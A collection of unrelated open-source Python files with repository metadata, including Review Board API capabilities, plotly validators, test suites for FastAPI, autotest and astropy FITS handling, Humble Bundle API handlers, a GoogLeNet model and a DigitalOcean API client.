except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version", "date": None}
|
wheeler-microfluidics/dmf_control_board_plugin
|
_version.py
|
Python
|
bsd-3-clause
| 18,441
| 0
|
from __future__ import unicode_literals
import logging
from django.conf import settings
from reviewboard import get_version_string, get_package_version, is_release
from reviewboard.admin.server import get_server_url
_registered_capabilities = {}
_capabilities_defaults = {
'diffs': {
'base_commit_ids': True,
'moved_files': True,
'validation': {
'base_commit_ids': True,
}
},
'review_requests': {
'commit_ids': True,
},
'scmtools': {
'git': {
'empty_files': True,
},
'mercurial': {
'empty_files': True,
},
'perforce': {
'moved_files': True,
'empty_files': True,
},
'svn': {
'empty_files': True,
},
},
'text': {
'markdown': True,
'per_field_text_types': True,
'can_include_raw_values': True,
},
}
def get_server_info(request=None):
"""Returns server information for use in the API.
This is used for the root resource and for the deprecated server
info resource.
"""
capabilities = _capabilities_defaults.copy()
capabilities.update(_registered_capabilities)
return {
'product': {
'name': 'Review Board',
'version': get_version_string(),
'package_version': get_package_version(),
'is_release': is_release(),
},
'site': {
'url': get_server_url(request=request),
'administrators': [
{
'name': name,
'email': email,
}
for name, email in settings.ADMINS
],
'time_zone': settings.TIME_ZONE,
},
'capabilities': capabilities
}
def register_webapi_capabilities(capabilities_id, caps):
"""Registers a set of web API capabilities.
These capabilities will appear in the dictionary of available
capabilities with the ID as their key.
    A capabilities_id must be passed in, and can only be registered once.
    A KeyError will be thrown if attempting to register it a second time.
"""
if not capabilities_id:
raise ValueError('The capabilities_id attribute must not be None')
if capabilities_id in _registered_capabilities:
raise KeyError('"%s" is already a registered set of capabilities'
% capabilities_id)
if capabilities_id in _capabilities_defaults:
raise KeyError('"%s" is reserved for the default set of capabilities'
% capabilities_id)
_registered_capabilities[capabilities_id] = caps
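# A small usage sketch (hypothetical capabilities ID and flags):
#
#   register_webapi_capabilities('my-extension', {
#       'supports_feature_x': True,
#   })
#
# The flags then appear keyed by 'my-extension' in the 'capabilities' section
# returned by get_server_info().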
def unregister_webapi_capabilities(capabilities_id):
"""Unregisters a previously registered set of web API capabilities."""
try:
del _registered_capabilities[capabilities_id]
except KeyError:
logging.error('Failed to unregister unknown web API capabilities '
'"%s".',
capabilities_id)
raise KeyError('"%s" is not a registered web API capabilities set'
% capabilities_id)
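if __name__ == '__main__':
    # Illustration only, not part of the original module: 'rbstones' and the
    # 'pretty_diffs' flag are hypothetical. Capabilities are keyed by ID,
    # surface under that ID in get_server_info()['capabilities'], and must be
    # unregistered before the same ID can be registered again.
    register_webapi_capabilities('rbstones', {'pretty_diffs': True})
    assert _registered_capabilities['rbstones'] == {'pretty_diffs': True}
    unregister_webapi_capabilities('rbstones')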
|
KnowNo/reviewboard
|
reviewboard/webapi/server_info.py
|
Python
|
mit
| 3,158
| 0
|
import _plotly_utils.basevalidators
class ValueminusValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="valueminus", parent_name="scatter3d.error_z", **kwargs
):
super(ValueminusValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
min=kwargs.pop("min", 0),
role=kwargs.pop("role", "info"),
**kwargs
)
|
plotly/python-api
|
packages/python/plotly/plotly/validators/scatter3d/error_z/_valueminus.py
|
Python
|
mit
| 512
| 0.001953
|
from httpx import AsyncClient
# Runtime import to avoid syntax errors in samples on Python < 3.5 and reach top-dir
import os
_TOP_DIR = os.path.abspath(
os.path.sep.join((
os.path.dirname(__file__),
'../',
)),
)
_SAMPLES_DIR = os.path.abspath(
os.path.sep.join((
os.path.dirname(__file__),
'../samples/',
)),
)
import sys
sys.path.append(_TOP_DIR)
sys.path.append(_SAMPLES_DIR)
from asyncutils import AsyncTestCase
from wiringfastapi import web
class WiringFastAPITest(AsyncTestCase):
client: AsyncClient
def setUp(self) -> None:
super().setUp()
self.client = AsyncClient(app=web.app, base_url='http://test')
def tearDown(self) -> None:
self._run(self.client.aclose())
super().tearDown()
def test_depends_marker_injection(self):
class ServiceMock:
async def process(self):
return 'Foo'
with web.container.service.override(ServiceMock()):
response = self._run(self.client.get('/'))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), {'result': 'Foo'})
def test_depends_injection(self):
response = self._run(self.client.get('/auth', auth=('john_smith', 'secret')))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), {'username': 'john_smith', 'password': 'secret'})
|
rmk135/objects
|
tests/unit/wiring/test_wiringfastapi_py36.py
|
Python
|
bsd-3-clause
| 1,426
| 0.004208
|
'''
:codeauthor: {{full_name}} <{{email}}>
'''
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase
from tests.support.mock import patch
import salt.states.{{module_name}} as {{module_name}}
class {{module_name|capitalize}}TestCase(TestCase, LoaderModuleMockMixin):
def setup_loader_modules(self):
return {% raw -%} {
{% endraw -%} {{module_name}} {%- raw -%}: {
'__env__': 'base'
}
} {%- endraw %}
def test_behaviour(self):
# Test inherent behaviours
pass
|
saltstack/salt
|
templates/test_state/tests/unit/states/test_{{module_name}}.py
|
Python
|
apache-2.0
| 590
| 0.015254
|
import logging
from autotest.client import utils
from autotest.client.shared import error
from virttest import env_process, utils_test
@error.context_aware
def run(test, params, env):
"""
Vhost zero copy test
    1) Enable/Disable vhost_net zero copy in the host.
    2) Boot the main vm.
    3) Run the ping test and check that the guest nic works.
    4) Check that the vm is alive and has not crashed.
:param test: QEMU test object.
:param params: Dictionary with the test parameters.
:param env: Dictionary with test environment.
"""
def zerocp_enable_status():
"""
Check whether host have enabled zero copy, if enabled return True,
else return False.
"""
def_para_path = "/sys/module/vhost_net/parameters/experimental_zcopytx"
para_path = params.get("zcp_set_path", def_para_path)
cmd_status = utils.system("grep 1 %s" % para_path, ignore_status=True)
if cmd_status:
return False
else:
return True
def enable_zerocopytx_in_host(enable=True):
"""
Enable or disable vhost_net zero copy in host
"""
cmd = "modprobe -rf vhost_net; "
if enable:
cmd += "modprobe vhost-net experimental_zcopytx=1"
else:
cmd += "modprobe vhost-net experimental_zcopytx=0"
if utils.system(cmd) or enable != zerocp_enable_status():
raise error.TestNAError("Set vhost_net zcopytx failed")
error.context("Set host vhost_net experimental_zcopytx", logging.info)
if params.get("enable_zerocp", 'yes') == 'yes':
enable_zerocopytx_in_host()
else:
enable_zerocopytx_in_host(False)
error.context("Boot vm with 'vhost=on'", logging.info)
params["vhost"] = "vhost=on"
params["start_vm"] = 'yes'
login_timeout = int(params.get("login_timeout", 360))
env_process.preprocess_vm(test, params, env, params.get("main_vm"))
vm = env.get_vm(params["main_vm"])
vm.verify_alive()
vm.wait_for_login(timeout=login_timeout)
guest_ip = vm.get_address()
error.context("Check guest nic is works by ping", logging.info)
status, output = utils_test.ping(guest_ip, count=10, timeout=20)
if status:
err_msg = "Run ping %s failed, after set zero copy" % guest_ip
raise error.TestError(err_msg)
elif utils_test.get_loss_ratio(output) == 100:
err_msg = "All packets lost during ping guest %s." % guest_ip
raise error.TestFail(err_msg)
# in vm.verify_alive will check whether have userspace or kernel crash
error.context("Check guest is alive and have no crash", logging.info)
vm.verify_alive()
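# A standalone sketch (not used by the test above and free of autotest
# dependencies) of the same zero-copy check done in zerocp_enable_status();
# the sysfs path matches the default used above and may vary between kernels.
def host_zerocopytx_enabled(
        path="/sys/module/vhost_net/parameters/experimental_zcopytx"):
    try:
        with open(path) as param:
            return param.read().strip() == "1"
    except IOError:
        return False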
|
ehabkost/tp-qemu
|
qemu/tests/zero_copy.py
|
Python
|
gpl-2.0
| 2,659
| 0
|
from __future__ import absolute_import
from collections import namedtuple
from django.conf import settings
from sentry.utils.dates import to_datetime
from sentry.utils.services import LazyServiceWrapper
from .backends.base import Backend # NOQA
from .backends.dummy import DummyBackend # NOQA
backend = LazyServiceWrapper(Backend, settings.SENTRY_DIGESTS,
settings.SENTRY_DIGESTS_OPTIONS,
(DummyBackend,))
backend.expose(locals())
class Record(namedtuple('Record', 'key value timestamp')):
@property
def datetime(self):
return to_datetime(self.timestamp)
ScheduleEntry = namedtuple('ScheduleEntry', 'key timestamp')
OPTIONS = frozenset((
'increment_delay',
'maximum_delay',
'minimum_delay',
))
def get_option_key(plugin, option):
assert option in OPTIONS
return 'digests:{}:{}'.format(plugin, option)
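# Usage sketch (illustration only; 'mail' is a hypothetical plugin slug):
# option keys are namespaced per plugin and must name one of OPTIONS, while
# Record exposes its timestamp as a datetime for convenience.
#
#     get_option_key('mail', 'minimum_delay')  # -> 'digests:mail:minimum_delay'
#     Record('event:1', payload, 1400000000.0).datetime  # datetime for the timestamp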
|
JackDanger/sentry
|
src/sentry/digests/__init__.py
|
Python
|
bsd-3-clause
| 910
| 0
|
"""
Handlers to process the responses from the Humble Bundle API
"""
__author__ = "Joel Pedraza"
__copyright__ = "Copyright 2014, Joel Pedraza"
__license__ = "MIT"
from humblebundle import exceptions
from humblebundle import models
import itertools
import requests
# Helper methods
def parse_data(response):
try:
return response.json()
except ValueError as e:
raise exceptions.HumbleParseException("Invalid JSON: %s", str(e),
request=response.request,
response=response)
def get_errors(data):
errors = data.get('errors', None)
error_msg = ", ".join(itertools.chain.from_iterable(v for k, v in errors.items())) \
if errors else "Unspecified error"
return errors, error_msg
def authenticated_response_helper(response, data):
# Successful API calls might not have a success property.
# It's not enough to check if it's falsy, as None is acceptable
success = data.get('success', None)
if success is True:
return True
error_id = data.get('error_id', None)
errors, error_msg = get_errors(data)
# API calls that require login and have a missing or invalid token
if error_id == 'login_required':
raise exceptions.HumbleAuthenticationException(
error_msg, request=response.request, response=response
)
# Something happened, we're not sure what but we hope the error_msg is
# useful
if success is False or errors is not None or error_id is not None:
raise exceptions.HumbleResponseException(
error_msg, request=response.request, response=response
)
# Response had no success or errors fields, it's probably data
return True
# Response handlers
def login_handler(client, response):
""" login response always returns JSON """
data = parse_data(response)
success = data.get('success', None)
if success is True:
return True
captcha_required = data.get('captcha_required')
authy_required = data.get('authy_required')
errors, error_msg = get_errors(data)
if errors:
captcha = errors.get('captcha')
if captcha:
raise exceptions.HumbleCaptchaException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
username = errors.get('username')
if username:
raise exceptions.HumbleCredentialException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
authy_token = errors.get("authy-token")
if authy_token:
raise exceptions.HumbleTwoFactorException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
raise exceptions.HumbleAuthenticationException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
def gamekeys_handler(client, response):
""" get_gamekeys response always returns JSON """
data = parse_data(response)
if isinstance(data, list):
return [v['gamekey'] for v in data]
# Let the helper function raise any common exceptions
authenticated_response_helper(response, data)
# We didn't get a list, or an error message
raise exceptions.HumbleResponseException(
"Unexpected response body", request=response.request, response=response
)
def order_list_handler(client, response):
""" order_list response always returns JSON """
data = parse_data(response)
if isinstance(data, list):
return [models.Order(client, order) for order in data]
# Let the helper function raise any common exceptions
authenticated_response_helper(response, data)
# We didn't get a list, or an error message
raise exceptions.HumbleResponseException(
"Unexpected response body", request=response.request, response=response
)
def order_handler(client, response):
""" order response might be 404 with no body if not found """
if response.status_code == requests.codes.not_found:
raise exceptions.HumbleResponseException(
"Order not found", request=response.request, response=response
)
data = parse_data(response)
# The helper function should be sufficient to catch any other errors
if authenticated_response_helper(response, data):
return models.Order(client, data)
def claimed_entities_handler(client, response):
"""
claimed_entities response always returns JSON
returns parsed json dict
"""
data = parse_data(response)
# The helper function should be sufficient to catch any errors
if authenticated_response_helper(response, data):
return data
def sign_download_url_handler(client, response):
""" sign_download_url response always returns JSON """
data = parse_data(response)
    # If the request is unauthorized (this includes invalid machine names),
    # this response has its own error syntax
errors = data.get('_errors', None)
message = data.get('_message', None)
if errors:
error_msg = "%s: %s" % (errors, message)
raise exceptions.HumbleResponseException(
error_msg, request=response.request, response=response
)
# If the user isn't signed in we get a "typical" error response
if authenticated_response_helper(response, data):
return data['signed_url']
def store_products_handler(client, response):
""" Takes a results from the store as JSON and converts it to object """
data = parse_data(response)
return [models.StoreProduct(client, result) for result in data['results']]
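# A minimal sketch (illustration only, not part of the library): handlers
# receive the client and a requests.Response-like object. _FakeResponse is a
# hypothetical stand-in used to show how parse_data() and get_errors()
# behave; real responses come from the client's requests session.
#
#     class _FakeResponse(object):
#         request = None
#         def json(self):
#             return {'success': False, 'errors': {'username': ['unknown user']}}
#
#     data = parse_data(_FakeResponse())    # -> the dict above
#     errors, error_msg = get_errors(data)  # -> ({'username': [...]}, 'unknown user')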
|
lutris/humblebundle-python
|
humblebundle/handlers.py
|
Python
|
mit
| 5,985
| 0.000668
|
__author__ = 'Varun Nayyar'
from Utils.MFCCArrayGen import emotions, speakers, getCorpus
from MCMC import MCMCRun
from emailAlerter import alertMe
def main2(numRuns = 100000, numMixtures = 8, speakerIndex = 6):
import time
for emotion in emotions:
start = time.ctime()
Xpoints = getCorpus(emotion, speakers[speakerIndex])
message = MCMCRun(Xpoints, emotion+"-"+speakers[speakerIndex], numRuns, numMixtures)
message += "Start time: {}\nEnd Time: {}\n".format(start, time.ctime())
message += "\nNumRuns: {}, numMixtures:{}\n ".format(numRuns, numMixtures)
message += "\nEmotion: {}, speaker:{}\n".format(emotion, speakers[speakerIndex])
alertMe(message)
if __name__ == "__main__":
for i in xrange(len(speakers)):
main2(numMixtures=8, speakerIndex=i)
|
nayyarv/MonteGMM
|
Inference/BayesInference.py
|
Python
|
mit
| 844
| 0.016588
|
default_app_config = 'user_deletion.apps.UserDeletionConfig'
|
incuna/django-user-deletion
|
user_deletion/__init__.py
|
Python
|
bsd-2-clause
| 61
| 0
|
'''GoogLeNet with PyTorch.'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
class Inception(nn.Module):
def __init__(self, in_planes, n1x1, n3x3red, n3x3, n5x5red, n5x5, pool_planes):
super(Inception, self).__init__()
# 1x1 conv branch
self.b1 = nn.Sequential(
nn.Conv2d(in_planes, n1x1, kernel_size=1),
nn.BatchNorm2d(n1x1),
nn.ReLU(True),
)
# 1x1 conv -> 3x3 conv branch
self.b2 = nn.Sequential(
nn.Conv2d(in_planes, n3x3red, kernel_size=1),
nn.BatchNorm2d(n3x3red),
nn.ReLU(True),
nn.Conv2d(n3x3red, n3x3, kernel_size=3, padding=1),
nn.BatchNorm2d(n3x3),
nn.ReLU(True),
)
# 1x1 conv -> 5x5 conv branch
self.b3 = nn.Sequential(
nn.Conv2d(in_planes, n5x5red, kernel_size=1),
nn.BatchNorm2d(n5x5red),
nn.ReLU(True),
nn.Conv2d(n5x5red, n5x5, kernel_size=3, padding=1),
nn.BatchNorm2d(n5x5),
nn.ReLU(True),
nn.Conv2d(n5x5, n5x5, kernel_size=3, padding=1),
nn.BatchNorm2d(n5x5),
nn.ReLU(True),
)
# 3x3 pool -> 1x1 conv branch
self.b4 = nn.Sequential(
nn.MaxPool2d(3, stride=1, padding=1),
nn.Conv2d(in_planes, pool_planes, kernel_size=1),
nn.BatchNorm2d(pool_planes),
nn.ReLU(True),
)
def forward(self, x):
y1 = self.b1(x)
y2 = self.b2(x)
y3 = self.b3(x)
y4 = self.b4(x)
return torch.cat([y1,y2,y3,y4], 1)
class GoogLeNet(nn.Module):
def __init__(self):
super(GoogLeNet, self).__init__()
self.pre_layers = nn.Sequential(
nn.Conv2d(3, 192, kernel_size=3, padding=1),
nn.BatchNorm2d(192),
nn.ReLU(True),
)
self.a3 = Inception(192, 64, 96, 128, 16, 32, 32)
self.b3 = Inception(256, 128, 128, 192, 32, 96, 64)
self.maxpool = nn.MaxPool2d(3, stride=2, padding=1)
self.a4 = Inception(480, 192, 96, 208, 16, 48, 64)
self.b4 = Inception(512, 160, 112, 224, 24, 64, 64)
self.c4 = Inception(512, 128, 128, 256, 24, 64, 64)
self.d4 = Inception(512, 112, 144, 288, 32, 64, 64)
self.e4 = Inception(528, 256, 160, 320, 32, 128, 128)
self.a5 = Inception(832, 256, 160, 320, 32, 128, 128)
self.b5 = Inception(832, 384, 192, 384, 48, 128, 128)
self.avgpool = nn.AvgPool2d(8, stride=1)
self.linear = nn.Linear(1024, 10)
def forward(self, x):
out = self.pre_layers(x)
out = self.a3(out)
out = self.b3(out)
out = self.maxpool(out)
out = self.a4(out)
out = self.b4(out)
out = self.c4(out)
out = self.d4(out)
out = self.e4(out)
out = self.maxpool(out)
out = self.a5(out)
out = self.b5(out)
out = self.avgpool(out)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
# net = GoogLeNet()
# x = torch.randn(1,3,32,32)
# y = net(Variable(x))
# print(y.size())
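# Usage sketch for newer PyTorch releases (assumption: torch >= 0.4, where
# tensors no longer need to be wrapped in Variable); mirrors the commented
# example above.
#
#     net = GoogLeNet()
#     x = torch.randn(1, 3, 32, 32)
#     y = net(x)
#     print(y.size())  # torch.Size([1, 10])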
|
2prime/DeepLab
|
ResNet/models/googlenet.py
|
Python
|
mit
| 3,237
| 0.001236
|
#!/usr/bin/env python
#coding: utf-8
"""
This module simply sends request to the Digital Ocean API,
and returns their response as a dict.
"""
import requests
API_ENDPOINT = 'https://api.digitalocean.com'
class DoError(RuntimeError):
pass
class DoManager(object):
def __init__(self, client_id, api_key):
self.client_id = client_id
self.api_key = api_key
def all_active_droplets(self):
json = self.request('/droplets/')
return json['droplets']
def new_droplet(self, name, size_id, image_id, region_id,
ssh_key_ids=None, virtio=False, private_networking=False,
backups_enabled=False):
params = {
'name': name,
'size_id': size_id,
'image_id': image_id,
'region_id': region_id,
'virtio': virtio,
'private_networking': private_networking,
'backups_enabled': backups_enabled,
}
if ssh_key_ids:
params['ssh_key_ids'] = ssh_key_ids
json = self.request('/droplets/new', params=params)
return json['droplet']
def show_droplet(self, id):
json = self.request('/droplets/%s' % id)
return json['droplet']
def reboot_droplet(self, id):
json = self.request('/droplets/%s/reboot/' % id)
json.pop('status', None)
return json
def power_cycle_droplet(self, id):
json = self.request('/droplets/%s/power_cycle/' % id)
json.pop('status', None)
return json
def shutdown_droplet(self, id):
json = self.request('/droplets/%s/shutdown/' % id)
json.pop('status', None)
return json
def power_off_droplet(self, id):
json = self.request('/droplets/%s/power_off/' % id)
json.pop('status', None)
return json
def power_on_droplet(self, id):
json = self.request('/droplets/%s/power_on/' % id)
json.pop('status', None)
return json
def password_reset_droplet(self, id):
json = self.request('/droplets/%s/password_reset/' % id)
json.pop('status', None)
return json
def resize_droplet(self, id, size_id):
params = {'size_id': size_id}
json = self.request('/droplets/%s/resize/' % id, params)
json.pop('status', None)
return json
def snapshot_droplet(self, id, name):
params = {'name': name}
json = self.request('/droplets/%s/snapshot/' % id, params)
json.pop('status', None)
return json
def restore_droplet(self, id, image_id):
params = {'image_id': image_id}
json = self.request('/droplets/%s/restore/' % id, params)
json.pop('status', None)
return json
def rebuild_droplet(self, id, image_id):
params = {'image_id': image_id}
json = self.request('/droplets/%s/rebuild/' % id, params)
json.pop('status', None)
return json
def enable_backups_droplet(self, id):
json = self.request('/droplets/%s/enable_backups/' % id)
json.pop('status', None)
return json
def disable_backups_droplet(self, id):
json = self.request('/droplets/%s/disable_backups/' % id)
json.pop('status', None)
return json
def rename_droplet(self, id, name):
params = {'name': name}
json = self.request('/droplets/%s/rename/' % id, params)
json.pop('status', None)
return json
def destroy_droplet(self, id, scrub_data=True):
params = {'scrub_data': '1' if scrub_data else '0'}
json = self.request('/droplets/%s/destroy/' % id, params)
json.pop('status', None)
return json
#regions==========================================
def all_regions(self):
json = self.request('/regions/')
return json['regions']
#images==========================================
def all_images(self, filter='global'):
params = {'filter': filter}
json = self.request('/images/', params)
return json['images']
def show_image(self, image_id):
params= {'image_id': image_id}
json = self.request('/images/%s/' % image_id, params)
return json['image']
def destroy_image(self, image_id):
self.request('/images/%s/destroy' % image_id)
return True
def transfer_image(self, image_id, region_id):
params = {'region_id': region_id}
json = self.request('/images/%s/transfer/' % image_id, params)
json.pop('status', None)
return json
#ssh_keys=========================================
def all_ssh_keys(self):
json = self.request('/ssh_keys/')
return json['ssh_keys']
def new_ssh_key(self, name, pub_key):
params = {'name': name, 'ssh_pub_key': pub_key}
json = self.request('/ssh_keys/new/', params)
return json['ssh_key']
def show_ssh_key(self, key_id):
json = self.request('/ssh_keys/%s/' % key_id)
return json['ssh_key']
def edit_ssh_key(self, key_id, name, pub_key):
params = {'name': name, 'ssh_pub_key': pub_key} # the doc needs to be improved
json = self.request('/ssh_keys/%s/edit/' % key_id, params)
return json['ssh_key']
def destroy_ssh_key(self, key_id):
self.request('/ssh_keys/%s/destroy/' % key_id)
return True
#sizes============================================
def sizes(self):
json = self.request('/sizes/')
return json['sizes']
#domains==========================================
def all_domains(self):
json = self.request('/domains/')
return json['domains']
def new_domain(self, name, ip):
params = {
'name': name,
'ip_address': ip
}
json = self.request('/domains/new/', params)
return json['domain']
def show_domain(self, domain_id):
json = self.request('/domains/%s/' % domain_id)
return json['domain']
def destroy_domain(self, domain_id):
self.request('/domains/%s/destroy/' % domain_id)
return True
def all_domain_records(self, domain_id):
json = self.request('/domains/%s/records/' % domain_id)
return json['records']
def new_domain_record(self, domain_id, record_type, data, name=None, priority=None, port=None, weight=None):
params = {
'record_type': record_type,
'data': data,
}
if name: params['name'] = name
if priority: params['priority'] = priority
if port: params['port'] = port
        if weight: params['weight'] = weight
json = self.request('/domains/%s/records/new/' % domain_id, params)
        return json['domain_record'] if 'domain_record' in json else json['record'] # DO API docs say 'domain_record', but it is actually 'record'
def show_domain_record(self, domain_id, record_id):
json = self.request('/domains/%s/records/%s' % (domain_id, record_id))
return json['record']
def edit_domain_record(self, domain_id, record_id, record_type, data, name=None, priority=None, port=None, weight=None):
params = {
'record_type': record_type,
'data': data,
}
if name: params['name'] = name
if priority: params['priority'] = priority
if port: params['port'] = port
        if weight: params['weight'] = weight
json = self.request('/domains/%s/records/%s/edit/' % (domain_id, record_id), params)
return json['domain_record'] if 'domain_record' in json else json['record'] # DO API docs say 'domain_record' for /new/ but 'record' for /edit/.
def destroy_domain_record(self, domain_id, record_id):
        self.request('/domains/%s/records/%s/destroy/' % (domain_id, record_id))
        return True
#events===========================================
def show_event(self, event_id):
json = self.request('/events/%s' % event_id)
return json['event']
#low_level========================================
    def request(self, path, params=None, method='GET'):
        if params is None:
            params = {}
        params['client_id'] = self.client_id
params['api_key'] = self.api_key
if not path.startswith('/'):
path = '/'+path
url = API_ENDPOINT+path
try:
resp = requests.get(url, params=params, timeout=60)
json = resp.json()
except ValueError: # requests.models.json.JSONDecodeError
raise ValueError("The API server doesn't respond with a valid json")
except requests.RequestException as e: # errors from requests
raise RuntimeError(e)
if resp.status_code != requests.codes.ok:
if json:
if 'error_message' in json:
raise DoError(json['error_message'])
elif 'message' in json:
raise DoError(json['message'])
            # The JSON response is bad, so raise an exception with the HTTP status
resp.raise_for_status()
if json.get('status') != 'OK':
raise DoError(json['error_message'])
return json
if __name__=='__main__':
import os
client_id = os.environ['DO_CLIENT_ID']
api_key = os.environ['DO_API_KEY']
do = DoManager(client_id, api_key)
import sys
fname = sys.argv[1]
import pprint
# size_id: 66, image_id: 1601, region_id: 1
pprint.pprint(getattr(do, fname)(*sys.argv[2:]))
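# Direct usage sketch (illustration only; the credentials and IDs below are
# placeholders, and the v1 endpoints used by this module require a valid
# client_id/api_key pair):
#
#     do = DoManager('my-client-id', 'my-api-key')
#     for droplet in do.all_active_droplets():
#         print(droplet['id'], droplet['name'], droplet['status'])
#     do.new_droplet('example', size_id=66, image_id=1601, region_id=1)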
|
chuwy/dopy
|
dopy/manager.py
|
Python
|
mit
| 9,514
| 0.003363
|
# Licensed under a 3-clause BSD style license - see PYFITS.rst
import math
import os
import re
import time
import warnings
import pytest
import numpy as np
from numpy.testing import assert_equal
from astropy.io import fits
from astropy.tests.helper import catch_warnings, ignore_warnings
from astropy.io.fits.hdu.compressed import SUBTRACTIVE_DITHER_1, DITHER_SEED_CHECKSUM
from .test_table import comparerecords
from . import FitsTestCase
try:
import scipy # noqa
except ImportError:
HAS_SCIPY = False
else:
HAS_SCIPY = True
class TestImageFunctions(FitsTestCase):
def test_constructor_name_arg(self):
"""Like the test of the same name in test_table.py"""
hdu = fits.ImageHDU()
assert hdu.name == ''
assert 'EXTNAME' not in hdu.header
hdu.name = 'FOO'
assert hdu.name == 'FOO'
assert hdu.header['EXTNAME'] == 'FOO'
# Passing name to constructor
hdu = fits.ImageHDU(name='FOO')
assert hdu.name == 'FOO'
assert hdu.header['EXTNAME'] == 'FOO'
# And overriding a header with a different extname
hdr = fits.Header()
hdr['EXTNAME'] = 'EVENTS'
hdu = fits.ImageHDU(header=hdr, name='FOO')
assert hdu.name == 'FOO'
assert hdu.header['EXTNAME'] == 'FOO'
def test_constructor_ver_arg(self):
def assert_ver_is(hdu, reference_ver):
assert hdu.ver == reference_ver
assert hdu.header['EXTVER'] == reference_ver
hdu = fits.ImageHDU()
assert hdu.ver == 1 # defaults to 1
assert 'EXTVER' not in hdu.header
hdu.ver = 1
assert_ver_is(hdu, 1)
# Passing name to constructor
hdu = fits.ImageHDU(ver=2)
assert_ver_is(hdu, 2)
# And overriding a header with a different extver
hdr = fits.Header()
hdr['EXTVER'] = 3
hdu = fits.ImageHDU(header=hdr, ver=4)
assert_ver_is(hdu, 4)
# The header card is not overridden if ver is None or not passed in
hdr = fits.Header()
hdr['EXTVER'] = 5
hdu = fits.ImageHDU(header=hdr, ver=None)
assert_ver_is(hdu, 5)
hdu = fits.ImageHDU(header=hdr)
assert_ver_is(hdu, 5)
def test_constructor_copies_header(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/153
Ensure that a header from one HDU is copied when used to initialize new
HDU.
"""
ifd = fits.HDUList(fits.PrimaryHDU())
phdr = ifd[0].header
phdr['FILENAME'] = 'labq01i3q_rawtag.fits'
primary_hdu = fits.PrimaryHDU(header=phdr)
ofd = fits.HDUList(primary_hdu)
ofd[0].header['FILENAME'] = 'labq01i3q_flt.fits'
# Original header should be unchanged
assert phdr['FILENAME'] == 'labq01i3q_rawtag.fits'
def test_open(self):
# The function "open" reads a FITS file into an HDUList object. There
# are three modes to open: "readonly" (the default), "append", and
# "update".
# Open a file read-only (the default mode), the content of the FITS
# file are read into memory.
r = fits.open(self.data('test0.fits')) # readonly
# data parts are latent instantiation, so if we close the HDUList
# without touching data, data can not be accessed.
r.close()
with pytest.raises(IndexError) as exc_info:
r[1].data[:2, :2]
# Check that the exception message is the enhanced version, not the
# default message from list.__getitem__
assert str(exc_info.value) == ('HDU not found, possibly because the index '
'is out of range, or because the file was '
'closed before all HDUs were read')
def test_open_2(self):
r = fits.open(self.data('test0.fits'))
info = ([(0, 'PRIMARY', 1, 'PrimaryHDU', 138, (), '', '')] +
[(x, 'SCI', x, 'ImageHDU', 61, (40, 40), 'int16', '')
for x in range(1, 5)])
try:
assert r.info(output=False) == info
finally:
r.close()
def test_open_3(self):
# Test that HDUs cannot be accessed after the file was closed
r = fits.open(self.data('test0.fits'))
r.close()
with pytest.raises(IndexError) as exc_info:
r[1]
# Check that the exception message is the enhanced version, not the
# default message from list.__getitem__
assert str(exc_info.value) == ('HDU not found, possibly because the index '
'is out of range, or because the file was '
'closed before all HDUs were read')
# Test that HDUs can be accessed with lazy_load_hdus=False
r = fits.open(self.data('test0.fits'), lazy_load_hdus=False)
r.close()
assert isinstance(r[1], fits.ImageHDU)
assert len(r) == 5
with pytest.raises(IndexError) as exc_info:
r[6]
assert str(exc_info.value) == 'list index out of range'
# And the same with the global config item
assert fits.conf.lazy_load_hdus # True by default
fits.conf.lazy_load_hdus = False
try:
r = fits.open(self.data('test0.fits'))
r.close()
assert isinstance(r[1], fits.ImageHDU)
assert len(r) == 5
finally:
fits.conf.lazy_load_hdus = True
def test_fortran_array(self):
# Test that files are being correctly written+read for "C" and "F" order arrays
a = np.arange(21).reshape(3,7)
b = np.asfortranarray(a)
afits = self.temp('a_str.fits')
bfits = self.temp('b_str.fits')
        # writing to str-specified files
fits.PrimaryHDU(data=a).writeto(afits)
fits.PrimaryHDU(data=b).writeto(bfits)
np.testing.assert_array_equal(fits.getdata(afits), a)
np.testing.assert_array_equal(fits.getdata(bfits), a)
        # writing to fileobjs
aafits = self.temp('a_fileobj.fits')
bbfits = self.temp('b_fileobj.fits')
with open(aafits, mode='wb') as fd:
fits.PrimaryHDU(data=a).writeto(fd)
with open(bbfits, mode='wb') as fd:
fits.PrimaryHDU(data=b).writeto(fd)
np.testing.assert_array_equal(fits.getdata(aafits), a)
np.testing.assert_array_equal(fits.getdata(bbfits), a)
def test_fortran_array_non_contiguous(self):
# Test that files are being correctly written+read for 'C' and 'F' order arrays
a = np.arange(105).reshape(3,5,7)
b = np.asfortranarray(a)
        # writing to str-specified files
afits = self.temp('a_str_slice.fits')
bfits = self.temp('b_str_slice.fits')
fits.PrimaryHDU(data=a[::2, ::2]).writeto(afits)
fits.PrimaryHDU(data=b[::2, ::2]).writeto(bfits)
np.testing.assert_array_equal(fits.getdata(afits), a[::2, ::2])
np.testing.assert_array_equal(fits.getdata(bfits), a[::2, ::2])
        # writing to fileobjs
